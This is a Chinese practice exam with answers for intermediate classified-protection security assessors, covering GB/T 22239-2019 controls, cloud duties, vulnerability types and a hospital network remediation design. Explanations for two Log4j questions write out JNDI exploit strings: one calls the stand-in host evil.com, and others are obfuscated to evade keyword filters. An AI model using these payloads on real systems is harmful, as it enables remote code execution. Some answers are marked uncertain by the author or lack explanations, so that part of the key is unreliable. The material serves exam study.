网络安全等级测评师能力评估（中级）样卷3及参考答案

一、单选（共 20 题，每题 1 分，共 20 分）

1. 以下（ B）是 Linux 操作系统用来配置审计规则的配置文件。

A. auditd.conf

B. audit.rules

C. audit.conf

D. auditd.rules

解析：

auditd.conf 只负责守护进程本身的运行参数（日志文件大小、轮转策略等），不存放审计规则。

/etc/audit/rules.d/audit.rules ← 管理员编辑的规则源文件

/etc/audit/audit.rules ← 启动时由 systemd 自动合并生成的最终规则文件（只读）

2. 不同服务模式下的安全管理责任由不同主体承担，以下不属于 IaaS 模式下云租户保护责任的是（ D）。

A. 应用及数据保护

B. 中间件层保护

C. 客户虚拟机保护

D. 硬件及虚拟化层保护

解析：

IaaS（基础设施即服务），提供虚拟化计算资源（服务器、存储、网络），用户需自行管理操作系统和应用层。典型服务商包括阿里云、华为云等

PaaS（平台即服务）‌提供完整的开发环境（如数据库、中间件），用户专注代码编写。典型案例：腾讯云 CloudBase（TCB）微信生态首选 PaaS，提供云函数、静态托管、云数据库、云存储，一键发布小程序/Web/移动应用。

SaaS（软件即服务）‌

提供可直接使用的完整应用（如企业邮箱、CRM系统），用户无需任何技术部署。‌‌

‌PaaS（平台即服务）

3. 以下（C ）不是作为定级对象的信息系统具有的基本特征。

A. 具有确定的主要安全责任主体

B. 承载单一的业务应用

C. 包含相互关联的多个资源

D. 承载相对独立的业务应用

解析：

4. 《网络安全法》第三十三条规定，建设关键信息基础设施应当确保其具有支持业务稳定、持续运行的性能，并保证安全技术措施（D ）。

A. 同步规划

B. 同步建设

C. 同步使用

D. 以上均是

解析：

第三十三条

建设关键信息基础设施应当确保其具有支持业务稳定、持续运行的性能，并保证安全技术措施同步规划、同步建设、同步使用。

5. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），在第三级安全管理测评中，不是“配置管理“控制点的核查要点的为（D ）。

A. 网络拓扑结构

B. 软件组件

C. 设备的配置参数

D. 重要的业务信息

解析：

安全运维管理 - 配置管理

三级要求：

a)应记录和保存基本配置信息，包括网络拓扑结构、各个设备安装的软件组件、软件组件的版本和补丁信息、各个设备或软件组件的配置参数等（二级）

b)应将基本配置信息改变纳入变更范畴，实施对配置信息改变的控制，并及时更新基本配置信息库（三级）

6. 某企业在信息系统建立完成后，由于公司缺少相关人才，决定选择第三方厂家进行系统运维工作，依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），以下错误的是（ A）。

A. 应确保外包运维服务商的选择满足公司需求和规定即可

B. 应与外包运维服务商签订相关协议，明确运维的范围、工作内容等

C. 选择的外包运维服务商在技术和管理方面均应具有按照等级保护要求开展安全运维工作的能力

D. 与外包运维服务商签订的协议中需明确可能涉及敏感信息的访问、处理、存储等相关的安全要求

解析：

安全运维管理 - 外包运维管理

三级要求：

a)应确保外包运维服务商的选择符合国家的有关规定（二级）

b)应与选定的外包运维服务商签订相关的协议，明确约定外包运维的范围、工作内容（二级）

c)应保证选择的外包运维服务商在技术和管理方面均应具有按照等级保护要求开展安全运维工作的能力，并将能力要求在签订的协议中明确（三级）

d)应在与外包运维服务商签订的协议中明确所有相关的安全要求，如可能涉及对敏感信息的访问、处理、存储要求，对IT基础设施中断服务的应急保障要求等（三级）

7. 依据《数据中心设计规范》（GB 50174-2017），以下机房温湿度在适宜的范围内的是（ABCD）。

A. 温度 25°，湿度 45%

B. 温度 22°，湿度 52%

C. 温度 19°，湿度 38%

D. 温度 21°，湿度 46%

解析：没找到，题有问题？

8. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），不属于“自行软件开发”安全要求项内容的是（ A）。

A. 应在验收后检测软件中可能存在的恶意代码

B. 开发环境与实际运行环境物理分开

C. 制定软件开发管理制度，明确说明开发过程的控制方法和人员行为准则

D. 制定代码编写安全规范，要求开发人员参照规范编写代码

解析：

三级：

安全建设管理 - 自行软件开发

a)应将开发环境与实际运行环境物理分开，测试数据和测试结果受到控制（二级）

b)应制定软件开发管理制度，明确说明开发过程的控制方法和人员行为准则（三级）

c)应制定代码编写安全规范，要求开发人员参照规范编写代码（三级）

d)应具备软件设计的相关文档和使用指南，并对文档使用进行控制（三级）

e)应保证在软件开发过程中对安全性进行测试，在软件安装前对可能存在的恶意代码进行检测（二级）

f)应对程序资源库的修改、更新、发布进行授权和批准，并严格进行版本控制（三级）

g)应保证开发人员为专职人员，开发人员的开发活动受到控制、监视和审查（三级）

9. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），“应对审计记录进行保护，定期备份，避免受到未预期的删除、修改或覆盖等。”属于第（B ）级（含以上）“安全计算环境”层面中“安全审计”的安全要求。

A.一

B.二

C.三

D.四

解析：

三级：

安全计算环境-安全审计

a)应启用安全审计功能，审计覆盖到每个用户，对重要的用户行为和重要安全事件进行审计（二级）

b)审计记录应包括事件的日期和时间、用户、事件类型、事件是否成功及其他与审计相关的信息（二级）

c)应对审计记录进行保护，定期备份，避免受到未预期的删除、修改或覆盖等（二级）

d)应对审计进程进行保护，防止未经授权的中断（三级）

10. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），第二级不包括以下哪些安全要求（D ）。

A. 入侵防范

B. 数据备份恢复

C. 数据完整性

D. 安全管理

解析：迷惑

11. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），“应建立异地灾难备份中心，提供业务应用的实时切换。”属于第（D ）级（含以上）“安全计算环境”层面中“数据备份恢复”控制点的安全要求。

A.一

B.二

C.三

D.四

解析：迷惑

安全计算环境 - 数据备份恢复

a)应提供重要数据的本地数据备份与恢复功能

b)应提供异地实时备份功能，利用通信网络将重要数据实时备份至备份场地(二级)

c)应提供重要数据处理系统的热冗余，保证系统的高可用性(三级)

d)应建立异地灾难备份中心，提供业务应用的实时切换（四级）

12. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），以下哪项不是第一级“安全计算环境”层面中“访问控制”方面的安全要求（D ）。

A. 应对登录的用户分配账户和权限

B. 应重命名或删除默认账户，修改默认账户的默认口令

C. 应及时删除或停用多余的、过期的账户，避免共享账户的存在

D. 应授予管理用户所需的最小权限，实现管理用户的权限分离

解析：

a)应对登录的用户分配账户和权限（一级开始有）

b)应重命名或删除默认账户，修改默认账户的默认口令（一级开始有）

c)应及时删除或停用多余的、过期的账户，避免共享账户的存在（一级开始有）

d)应授予管理用户所需的最小权限，实现管理用户的权限分离（二级开始有）

e)应由授权主体配置访问控制策略，访问控制策略规定主体对客体的访问规则（三级开始有）

f)访问控制的粒度应达到主体为用户级或进程级，客体为文件，数据库表级（三级开始有）

g)应对重要主体和客体设置安全标记，并控制主体对有安全标记信息资源的访问（三级开始有）

13. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），不属于第二级云计算安全扩展要求中安全通信网络方面要求的是（ D）。

A. 应保证云计算平台不存在高于其安全保护等级的业务应用系统

B. 应实现不同云服务客户虚拟网络之间的隔离

C. 应具有根据云服务客户业务需求提供通信传输、边界防护、入侵防范等安全机制的能力

D. 应提供开放接口或开放性安全服务，允许云服务客户接入第三方安全产品或在云计算平台选择第三方安全服务

解析：

安全通信网络 - 网络架构-云拓展

a) 应保证云计算平台不承载高于其安全保护等级的业务应用系统（一级开始有）

b) 应实现不同云服务客户虚拟网络之间的隔离（一级开始有）

c) 应具有根据云服务客户业务需求提供通信传输、边界防护、入侵防范等安全机制的能力（二级开始有）

d) 应具有根据云服务客户业务需求自主设置安全策略的能力，包括定义访问路径、选择安全组件、配置安全策略（三级开始有）

e) 应提供开放接口或开放性安全服务，允许云服务客户接入第三方安全产品或在云计算平台选择第三方安全服务（三级开始有）

14. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019）中云计算安全扩展要求，下列关于云服务商选择安全控制点不是第二级安全控制要求项的是（ C）。

A. 应选择安全合规的云服务商，其所提供的云计算平台应为其所承载的业务应用系统提供相应等级的安全保护能力

B. 应在服务水平协议中规定云服务的各项服务内容和具体技术指标

C. 应与选定的云服务商签署保密协议，要求其不得泄露云服务客户数据

D. 应在服务水平协议中规定服务合约到期时，完整提供云服务客户数据，并承诺相关数据在云计算平台上清除

解析：

安全建设管理 - 云服务商选择--云拓展

a) 应选择安全合规的云服务商，其所提供的云计算平台应为其所承载的业务应用系统提供相应等级的安全保护能力（一级开始有）

b) 应在服务水平协议中规定云服务的各项服务内容和具体技术指标（一级开始有）

c) 应在服务水平协议中规定云服务商的权限与责任，包括管理范围、职责划分、访问授权、隐私保护、行为准则、违约责任等（一级开始有）

d) 应在服务水平协议中规定服务合约到期时，完整提供云服务客户数据，并承诺相关数据在云计算平台上清除（二级开始有）

e) 应与选定的云服务商签署保密协议，要求其不得泄露云服务客户数据（三级开始有）

15. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），云服务商在进行数据中心选址时，数据中心可位于（D ）。

A. 澳门

B. 台湾

C. 东京

D. 山东

解析：无

16. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019）云计算安全扩展要求，“安全计算环境”层面中“入侵防范”控制点，以下哪项描述是错误的（D ）。

A. 应能检测虚拟机之间的资源隔离失效，并进行告警

B. 应能检测非授权新建虚拟机或者重新启用虚拟机，并进行告警

C. 应能够检测恶意代码感染及在虚拟机间蔓延的情况，并进行告警

D. 应能够阻止所有来自外部网络的访问，以确保绝对的安全

安全区域边界-入侵防范-云拓展

a) 应能检测到云服务客户发起的网络攻击行为，并能记录攻击类型、攻击时间、攻击流量等（二级开始）

b) 应能检测到对虚拟网络节点的网络攻击行为，并能记录攻击类型、攻击时间、攻击流量等（二级开始）

c) 应能检测到虚拟机与宿主机、虚拟机与虚拟机之间的异常流量（二级开始）

d) 应在检测到网络攻击行为、异常流量情况时进行告警（三级开始有）

安全计算环境 - 入侵防范-云拓展（三级开始有）

a) 应能检测虚拟机之间的资源隔离失效，并进行告警（三级开始有）

b) 应能检测非授权新建虚拟机或者重新启用虚拟机，并进行告警（三级开始有）

c) 应能够检测恶意代码感染及在虚拟机间蔓延的情况，并进行告警（三级开始有）

17．依据《信息安全技术网络安全等级保护测评过程指南》（GB/T 28449-2018），以下哪个过程不属于等级保护测评过程？ (A)

A. 定级备案

B. 测评准备

C. 现场实施

D. 方案编制

解析：

18. Apache Log4j2 远程代码执行漏洞（CVE-2021-44228）的本质是基于（ A）漏洞类型。

A. JNDI 注入

B. SQL 注入

C. 命令注入

D. Jinja2 注入

解析：

Log4j2 在解析日志消息时，会对形如 ${jndi:ldap://evil.com/obj} 的 Look-up 表达式进行递归替换。

当占位符以 jndi: 开头时，Log4j2 会调用 Java 的 JNDI API 去远程加载对象。

攻击者把恶意 LDAP/RMI/DNS 服务器地址写入日志，服务端就会向该地址发起 JNDI 查询并反序列化返回的恶意对象，导致任意代码执行。

因此漏洞本质是“不可信输入被直接拼接到 JNDI 查询地址”——典型的 JNDI 注入（JNDI Injection）

19. Apache Shiro 框架的 Shiro550 漏洞（CVE-2016-4437）的本质是基于（A ）漏洞类型。

A. 反序列化漏洞

B. 表达式注入漏洞

C. PaddingOracle

D. 文件上传

解析：

Shiro 的“RememberMe”功能会把用户身份信息序列化后用固定 AES 密钥加密，再放回 Cookie。

由于 ≤1.2.4 版本密钥硬编码，攻击者可把恶意序列化数据用同一密钥加密后塞进 Cookie。

服务端解密后无条件进行 ObjectInputStream.readObject()，触发反序列化链，造成 RCE。

漏洞核心在于“对不可信字节流进行反序列化”，因此其本质属于密钥硬编码+反序列化漏洞

20. 以下操作系统中最容易遭受网络攻击的是（A ）。

A. Windows

B. Linux

C. Android

D.Unix

解析：

市场占有率桌面端>80%，服务器端也占近半，攻击面最大；

默认开启大量服务（RDP、SMB、NetBIOS、WMI、PowerShell等），历史高危漏洞（MS08-067、EternalBlue、BlueKeep、PrintNightmare）层出不穷；

图形化环境+弱口令策略+用户常以管理员身份运行，使钓鱼、宏病毒、勒索软件极易落地

二、不定项（共 20 题，每题 2 分，共 40 分）

1. 以下属于等级测评工作要求的是（ ABCD）。

A. 恰当选取

B. 保证强度

C. 规范行为

D. 规避风险

解析：GBT-28449-2018 附录B

2. 宜使用以下（ABC ）对安全设备或安全组件进行管理。

A. SSH

B. HTTPS

C. IPSec VPN

D. Telnet

解析：ABD都知道，C选项IPSec VPN：先建立加密隧道，再把管理流量封装在隧道内，适用于跨网络、跨机房的远程集中管理。

3. 《网络安全等级测评报告模板》（2025 版）中明确，以下哪些属于重大风险隐患的判定原则。（ABC）

A. 相关性原则

B. 严重性原则

C. 高发性原则

D. 普遍性原则

解析：无

4. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），第三级等级保护对象的人员配备内容包括（AB ）。

A. 应配备一定数量的系统管理员、网络管理员、安全管理员等

B. 应配备专职安全管理员，不可兼任

C. 应配备专职信息安全管理人员，实行 A、B 岗制度

D. 关键事务岗位应配备多人共同管理

解析：

安全管理机构 - 人员配备

一级：

a)应配备一定数量的系统管理员(一级要求)

二级、三级、四级：

a)应配备一定数量的系统管理员、审计管理员和安全管理员等（二级开始要求）

b)应配备专职安全管理员，不可兼任（三级开始要求）

c)关键事务岗位应配备多人共同管理（四级要求）

5. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），下列选项中，属于第三级安全要求项的是（ ABCD）。

A. 应制定重要事件的应急预案，包括应急处理流程、系统恢复流程等内容

B. 应对恶意代码防范要求做出规定，包括防恶意代码软件的授权使用、恶意代码库升级、恶意代码的定期查杀等

C. 应进行上线前的安全性测试，并出具安全测试报告，安全测试报告应包含密码应用安全性测试相关内容

D. 外部人员离场后应及时清除其所有的访问权限

解析：

A选项：

安全运维管理 - 应急预案管理

二级：

a)应制定重要事件的应急预案，包括应急处理流程、系统恢复流程等内容

b)应定期对系统相关的人员进行应急预案培训，并进行应急预案的演练

三级：

a)应规定统一的应急预案框架，包括启动预案的条件、应急组织构成、应急资源保障、事后教育和培训等内容

b)应制定重要事件的应急预案，包括应急处理流程、系统恢复流程等内容

c)应定期对系统相关的人员进行应急预案培训，并进行应急预案的演练

d)应定期对原有的应急预案重新评估，修订完善

B选项：

C选项：

D选项：

安全管理人员 - 外部人员访问管理

a)应在外部人员物理访问受控区域前先提出书面申请，批准后由专人全程陪同，并登记备案（二级以上要求）

b)应在外部人员接人受控网络访问系统前先提出书面申请，批准后由专人开设账户、分配权限，并登记备案（二级以上要求）

c)外部人员离场后应及时清除其所有的访问权限（二级以上要求）

d)获得系统访问授权的外部人员应签署保密协议，不得进行非授权操作，不得复制和泄露任何敏感信息（三级要求）

6. 依据《信息安全技术网络安全等级保护测评要求》（GB/T 28448-2019），在网络安全等级保护的不同级别中，关于服务供应商管理的测评实施要点，正确的是（ BD）。

A. 在第三级，测评实施要点与第二级完全相同，无需进行额外的审核和检查

B. 在第二级，除了核查服务合同的相关责任外，还需要整个服务供应链各方需履行的网络安全相关义务

C. 在第三级，需要核查服务评价审核制度，包括定期审核评价报告、查验评价指标、考核内容和考核结果

D. 在第四级，测评实施要点与第三级完全相同，无需进行额外的审核和检查

解析：

7. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），“应设置机房防盗报警系统或设置有专人值守的视频监控系统。”属于以下哪个安全等级的安全要求（CD ）。

A.一

B.二

C.三

D.四

解析：

安全物理环境 - 防盗窃和防破坏

a)应将设备或主要部件进行固定，并设置明显的不易除去的标识（一级）

b)应将通信线缆铺设在隐蔽安全处（二级）

c)应设置机房防盗报警系统或设置有专人值守的视频监控系统（三级）

8. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），各级别等级保护对象的基本安全要求，从一级到四级呈现逐渐增强的趋势，具体表现在以下哪些方面（ABCD ）。

A. 控制点增强

B. 同一控制点的要求项增加

C. 同一要求项的要求强度增强

D. 控制点增加

解析：

无

9. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），“安全计算环境”层面中第三级比第二级增加了以下哪些控制点（ B）。

A. 数据完整性

B. 数据保密性

C. 数据备份恢复

D. 可信验证

解析：

10. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019）的移动互联安全扩展要求，以下选项是移动终端允许安装的是（ BD）。

A. 市场上知名应用的测试版本

B. 通过可靠分发渠道而来的应用

C. 国外知名软件企业开发的应用

D. 具备系统管理者指定证书签名的应用

解析：

安全计算环境 - 移动应用管控

a) 应具有选择应用软件安装、运行的功能（二级开始有）

b) 应只允许指定证书签名的应用软件安装和运行（二级开始有）

c) 应具有软件白名单功能，应能根据白名单控制应用软件安装、运行（三级开始有）

安全建设管理 - 移动应用软件采购

a) 应保证移动终端安装、运行的应用软件来自可靠分发渠道或使用可靠证书签名（二级开始有）

b) 应保证移动终端安装、运行的应用软件由指定的开发者开发（二级开始有）

11. 依据《信息安全技术网络安全等级保护测评要求》（GB/T 28448-2019）测评要求，大数据领域的特征包括（ ABCD）。

A. Value（价值高）

B. Volume（体量大）

C. Variety（种类多）

D. Velocity（速度快）

解析：无

12. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），以下哪些安全要求属于第三级移动互联安全扩展要求（ABC ）。

A. 应具有选择应用软件安装、运行的功能

B. 应只允许指定证书签名的应用软件安装和运行

C. 应具有软件白名单功能，应能根据白名单控制应用软件安装、运行

D. 应具有接受移动终端管理服务端推送的移动应用软件管理策略，并根据该策略对软件实施管控的能力

解析：

安全计算环境 - 移动应用管控

a) 应具有选择应用软件安装、运行的功能（一级）

b) 应只允许指定证书签名的应用软件安装和运行（二级）

c) 应具有软件白名单功能，应能根据白名单控制应用软件安装、运行（三级）

d) 应具有接受移动终端管理服务端推送的移动应用软件管理策略，并根据该策略对软件实施管控的能力（四级）

13. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019）云计算安全扩展要求，以下哪项安全要求属于“安全区域边界”层面中“入侵防范”控制点（ABD ）。

A. 应能检测到虚拟机与宿主机、虚拟机与虚拟机之间的异常流量

B. 应能检测到对虚拟网络节点的网络攻击行为，并能记录攻击类型、攻击时间、攻击流量等

C. 应能检测到云服务商发起的网络攻击行为，并能记录攻击类型、攻击时间、攻击流量等

D. 应在检测到网络攻击行为、异常流量情况时进行告警

解析：

安全区域边界-入侵防范-云拓展

a) 应能检测到云服务客户发起的网络攻击行为，并能记录攻击类型、攻击时间、攻击流量等（二级开始）

b) 应能检测到对虚拟网络节点的网络攻击行为，并能记录攻击类型、攻击时间、攻击流量等（二级开始）

c) 应能检测到虚拟机与宿主机、虚拟机与虚拟机之间的异常流量（二级开始）

d) 应在检测到网络攻击行为、异常流量情况时进行告警（三级开始有）

安全计算环境 - 入侵防范-云拓展（三级开始有）

a) 应能检测虚拟机之间的资源隔离失效，并进行告警（三级开始有）

b) 应能检测非授权新建虚拟机或者重新启用虚拟机，并进行告警（三级开始有）

c) 应能够检测恶意代码感染及在虚拟机间蔓延的情况，并进行告警（三级开始有）

14. 依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），以下哪项不是第一级“安全计算环境”层面中“访问控制”方面的安全要求（D ）。

A. 应对登录的用户分配账户和权限

B. 应重命名或删除默认账户，修改默认账户的默认口令

C. 应及时删除或停用多余的、过期的账户，避免共享账户的存在

D. 应授予管理用户所需的最小权限，实现管理用户的权限分离

解析：

15. 可能会威胁到 nginx 安全性的配置有（ AB）。

A. fastcgi_split_path_info ^(.*)(\.php)?$;

B. fastcgi_param PATH_INFO $request_uri;

C. fastcgi_pass unix:/var/run/php-fpm/php-fpm.sock

D. fastcgi_pass 127.0.0.1:9000

解析：

这题不确定

A:如果此正则表达式使用不当（比如未正确校验 $fastcgi_script_name 是否为真实存在的 PHP 文件），攻击者可能通过构造恶意 URL，让 Nginx 将非 PHP 文件（如用户上传的图片）当做 PHP 脚本执行。

B:$request_uri 是客户端发来的原始请求，可能包含非法字符、路径遍历、恶意参数等。将其直接作为 PATH_INFO 传递给 PHP，可能导致 PHP 应用解析错误，或者更严重的，被利用进行路径操控、注入攻击等

C:常见操作，这是将 FastCGI 请求通过 Unix Domain Socket 传递给 PHP-FPM，是一种常见且相对安全的通信方式。

D:通过 TCP 的本地回环地址（127.0.0.1）将 FastCGI 请求发送到本地的 PHP-FPM 服务，监听在 9000 端口。

16. 可以对 Log4j2 进行攻击的语句包括（ABCD ）。

A. ${jndi:ldap://127.0.0.1:1389/exp}

B. ${${sys::jndi}:ldap://127.0.0.1:1389/exp}

C. ${${env:foo:-jndi}:ldap://127.0.0.1:1389/exp}

D. ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1:1389/exp}

解析：

A. ${jndi:ldap://127.0.0.1:1389/exp}

默认攻击载荷，通过 JNDI 调用 LDAP 服务加载恶意类

B. ${${sys::jndi}:ldap://127.0.0.1:1389/exp}

使用系统属性 lookup（${sys::jndi}）动态解析出 "jndi"，绕过简单过滤，同样可触发攻击。

C. ${${env:foo:-jndi}:ldap://127.0.0.1:1389/exp}

通过环境变量 lookup（${env:foo:-jndi}）获取值（默认回退为 "jndi"），实现绕过并执行 JNDI 注入。

D. ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1:1389/exp}使用字符串替换（${::-*}）拼接出 "jndi:ldap"，避免直接关键字检测

17. 在使用 Electron 开发桌面应用时，导致远程代码执行（RCE）的不安全动作包括（ AD）。

A. 在渲染进程中开启 nodeIntegration: true 并加载远程 URL

B. 在渲染进程中开启 contextIsolation: true

C. 禁用 webviewTag 功能，并使用 CSP 限制脚本来源

D. 允许渲染进程直接访问 require('fs') 并加载未受信任的网页

解析：

A:开启 nodeIntegration 允许渲染进程使用 Node.js API，如果同时加载远程 URL，恶意代码可以通过 Node.js API 执行系统命令，导致 RCE。

B:开启上下文隔离

C：一看就对

D.:允许渲染进程直接访问 Node.js 模块（如 fs）并加载未受信任的网页，恶意代码可以通过这些模块执行文件操作或系统命令，导致RCE

18. 在云环境中，可能导致安全风险或数据泄露的操作包括（BCD）。

A. 使用多因素认证（MFA）保护管理账户

B. 将敏感 API 密钥硬编码在应用程序或前端代码中

C. 对象存储中将桶/容器设置为公开可读或公开可写

D. 未对云数据库开启加密或网络访问控制

解析：

A：安全

B：高危

C：有风险

D：有风险

19. 存在 Java 反序列化漏洞的组件/框架包括（ABC ）。

A. Weblogic

B. Websphere

C. Shiro

D. Thinkphp

解析：

ABC:底层均为JAVA且，均爆出过反序列化漏洞

D：PHP

20. docker remote API 未授权访问会造成（ABC ）。

A. 攻击者控制任意容器

B. 攻击者控制宿主机

C. 攻击者窃取容器内数据

D. 攻击者控制 openstack

解析：拿下docker，逃逸到宿主机也控制不了openstack云管平台

三、简答（共 3 题，每题 10 分，共 30 分）

1．依据《关于对网络安全等级保护有关工作事项进一步说明的函》（公网安〔2025〕1846 号），保护工作方案的范围和主要内容包括哪些？

答：第三级（含）以上网络系统运营者需以定级责任单位为主体提交保护工作方案，保护工作方案以年度测评中发现的重大风险隐患为重点，同时统筹考量高中低风险问题，全面梳理分析安全保护需求。保护工作方案应至少包括但不限于以下内容：资产情况（互联网资源情况、基础环境情况、网络设备情况、系统软件情况、网络安全产品情况等）、现有安全保护措施、问题成因、整改思路及后续工作计划等。

2．依据《信息安全技术网络安全等级保护基本要求》（GB/T 22239-2019），简述第三级网络系统与第二级网络系统在安全管理机构方面标准内容的主要差异。

答：

1、安全管理机构 - 岗位设置：三级比二级增加了一项：应成立指导和管理网络安全工作的委员会或领导小组，其最高领导由单位主管领导担任或授权，岗位设置要求更明确。

2、安全管理机构 - 人员配备：二级要求“应配备一定数量的系统管理员、审计管理员和安全管理员等”，三级在此基础上增加了“应配备专职安全管理员，不可兼任”，人员配备要求更高。

3、安全管理机构 - 授权和审批

二级要求”应针对系统变更、重要操作、物理访问和系统接人等事项执行审批过程“，三级为“)应针对系统变更、重要操作、物理访问和系统接入等事项建立审批程序，按照审批程序执行审批过程，对重要活动建立逐级审批制度”，并增加了c项“c)应定期审查审批事项，及时更新需授权和审批的项目、审批部门和审批人等信息”

4、安全管理机构 - 审核和检查

二级要求

a)应定期进行常规安全检查，检查内容包括系统日常运行、系统漏洞和数据备份等情况

三级要求

a)应定期进行常规安全检查，检查内容包括系统日常运行、系统漏洞和数据备份等情况

b)应定期进行全面安全检查，检查内容包括现有安全技术措施的有效性、安全配置与安全策略的一致性、安全管理制度的执行情况等

c)应制定安全检查表格实施安全检查，汇总安全检查数据，形成安全检查报告，并对安全检查结果进行通报”

3．依据《信息安全技术网络安全等级保护测评过程指南》（GB/T 28449-2018），简述网络安全等级保护测评方案编制活动中，测评机构和测评委托单位的双方职责？？

答：

测评机构的职责：

1、详细分析被测定级对象的整体结构、边界、网络区域测评、主要设备部署情况。

2、分析确定测评对象、测评指标，确定测评内容和工具测试方法。

3、编制测评方案文本，并进行内部评审。

4、制定风险规避实施方案。

5、初步判定被测定级对象的安全薄弱点。

测评委托单位的职责：

1、为测评机构完成测评方案提供相关信息和资料。

2、对测评方案文本进行评审和确认。

3、对测评机构提供的风险规避实施方案进行进行评审和确认。

四、设计（共 1 题，每题 10 分，共 10 分）

1. 该拓扑为某医院三级系统网络拓扑图，请根据等保 2.0 的中对于安全通信网络，安全区域边界的要求，说明该拓扑中不符合的地方，并提出对应整改意见。。

答：

安全通信网络：

一、该拓扑中不符合的地方：

1、从拓扑来看，该系统未进行网络区域划分。

2、应用服务器作为重要节点，可能直接部署在网络边界。

3、互联网边界防火墙、应用服务器等未采用热冗余方式部署，通信链路未冗余部署。

二、整改建议

1、建议根据业务需求进行区域划分，如业务互联网区、核心交换区、服务器区、数据中心服务器区、办公区、移动wifi无线上网区、卫生专网区等，不同区域间通过VLAN隔离，并根据业务需求进行访问控制。

2、建议将拓扑中笼统的“应用服务器”从通用服务器区中剥离，单独划分出一个逻辑隔离的“业务服务器区。在该“业务服务器区”的前端部署专用的防火墙（或利用现有防火墙的独立接口区），严格配置访问控制策略。在业务服务器区内部，于应用服务器前增加反向代理服务器（如Nginx, HAProxy），或部署Web应用防火墙（WAF），反向代理对外屏蔽真实应用服务器的IP地址和内部拓扑，具备安全模块的反向代理可以有效识别和阻断SQL注入、跨站脚本（XSS）等针对应用层的攻击。

3、现有的单台互联网边界防火墙改造为双机热备（Active-Standby）或双活（Active-Active）集群，应用服务器摒弃单机部署模式，采用服务器集群或双击热备，向不同运营商（如中国电信、中国移动）申请两条或多条互联网宽带。通过路由策略（如策略路由、BGP）实现链路负载均衡和自动故障切换。

安全区域边界：

一、该拓扑中不符合的地方：

1、拓扑中互联网和卫生专网直接连接防火墙，但防火墙可能配置不当或缺乏多层级防护，无法保证跨越边界的访问和数据流通过边界设备提供的受控接口进行通信。

2、不能对非授权设备私自联到内部网络的行为进行检查或限制，拓扑中缺乏有效的技术手段来发现和阻止非授权设备（如员工私自携带的笔记本电脑、手机、无线AP等）接入内部网络。一旦这些设备通过空闲的网络端口或私自架设的Wi-Fi接入，就可能成为攻击者渗透内网的跳板。

3、拓扑中的上网行为管理设备通常用于控制用户访问互联网，但可能无法有效检测和阻止用户通过非法隧道（如使用4G/5G网卡、手机开热点）连接到外部网络。这种行为（俗称“网络双通”）会创建一个绕过所有边界安全控制的隐蔽通道，导致敏感数据泄露，并让外部攻击直接进入内网终端。

4、无线网络成为了内部有线网络的一个未受控的延伸接入点。移动设备接入后，其访问权限与有线办公区电脑无异，这相当于将潜在的攻击点直接部署在了网络内部，违反了安全区域边界的原则。

5、虽然部署了防火墙，但其主要功能在于网络层的访问控制，对于隐藏在合法流量中的应用层攻击（如SQL注入、漏洞利用）、内部横向移动攻击、以及新型或未知威胁的检测能力严重不足。同时，网络节点处缺乏统一的威胁检测引擎，无法对内外发起的攻击进行有效识别和阻断；对网络行为的分析能力缺失，难以发现高级持续性威胁；且各安全组件日志分散，无法在检测到攻击时自动、关联地记录攻击详情并产生有效报警，导致整体安全态势不可见，响应能力滞后。

6、恶意代码防护缺失、垃圾邮件防护缺失。

7、拓扑中仅在互联网出口有“上网行为管理”，这只能记录访问互联网的用户行为。但在网络边界（如与卫生专网的边界、互联网防火墙）和重要网络节点（如核心交换机、服务器区边界）处，缺乏全面的安全审计。无法对通过这些关键节点的所有用户访问、攻击告警、策略变更等重要安全事件进行记录。

8、远程访问？懒得写了，包含在综合审计里边了。

二、整改建议

1、在卫生专网边界处增加防火墙进行访问控制，在互联网防火墙和卫生专网防火墙连接的接口上，明确配置为安全区域的受控接口，按照最小权限原则授权。

2、在核心交换机及接入交换机上启用802.1X协议，终端设备在接入网络端口或企业Wi-Fi时，必须提供合法的员工账号密码或数字证书进行认证。认证通过后，交换机才为其开放网络访问权限。

3、通过统一的终端安全管理系统，下发强制策略，禁用终端电脑的无线网卡和USB接口（或禁止安装USB 4G/5G网卡驱动）。

4、单独创建一个专门的 “无线访客区” （或根据员工和访客进一步划分为“无线办公区”和“无线访客区”），启动身份认证无线准入功能，并接入上网行为管理。

5、在网络核心交换机处通过镜像端口或网络分光方式，将全部网络流量送往一个全流量威胁分析平台进行安全事件分析并告警，识别到攻击行为联动防火墙进行攻击阻断。

6、在互联网边界部署下一代防火墙（NGFW）或统一威胁管理（UTM），并启用其高级恶意代码防护功能。对所有流入、流出互联网的流量（包括网页浏览、文件下载等）进行实时扫描，发现并阻断恶意软件，在邮件系统前端部署专业的防病毒网关、反垃圾邮件网关或启用云邮件安全服务。对所有进出邮件进行深度扫描，剥离邮件附件中的恶意代码，并对恶意链接进行沙箱分析或实时屏蔽。

7、建议综合日志审计系统，配置所有关键节点设备（包括防火墙、核心交换机、上网行为管理、IPS、WAF、VPN网关等）将其日志（包括系统事件、安全事件、流量日志、用户访问日志）统一发送到综合日志审计系统，审计记录至少保存6个月以上。